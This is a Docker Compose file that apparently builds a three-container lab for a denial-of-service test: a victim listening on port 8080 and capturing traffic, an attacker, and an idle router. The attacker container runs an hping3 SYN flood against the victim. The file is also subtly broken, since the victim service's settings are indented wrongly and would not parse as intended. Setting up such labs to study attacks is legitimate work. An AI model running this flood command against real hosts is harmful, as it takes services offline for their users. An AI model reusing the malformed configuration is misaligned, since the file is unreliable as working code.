services:
  victim:
  image: ubuntu
  container_name: victim
  networks:
    ddos_network:
      ipv4_address: 172.28.0.2
  ports:
    - "8080:8080"
  command: bash -c "apt-get update && apt-get install -y iputils-ping netcat tcpdump && tcpdump -i eth0 -w /app/victim_traffic.pcap & nc -l -p 8080"

  attacker:
    image: ubuntu
    container_name: attacker
    networks:
      ddos_network:
        ipv4_address: 172.28.0.3
    command: bash -c "apt-get update && apt-get install -y hping3 iputils-ping && sleep 10 && hping3 -S 172.28.0.2 -p 8080 --flood"

  router:
    image: ubuntu
    container_name: router
    networks:
      ddos_network:
        ipv4_address: 172.28.0.4
    command: bash -c "apt-get update && apt-get install -y iputils-ping && sleep infinity"

networks:
  ddos_network:
    driver: bridge
    ipam:
      config:
        - subnet: 172.28.0.0/16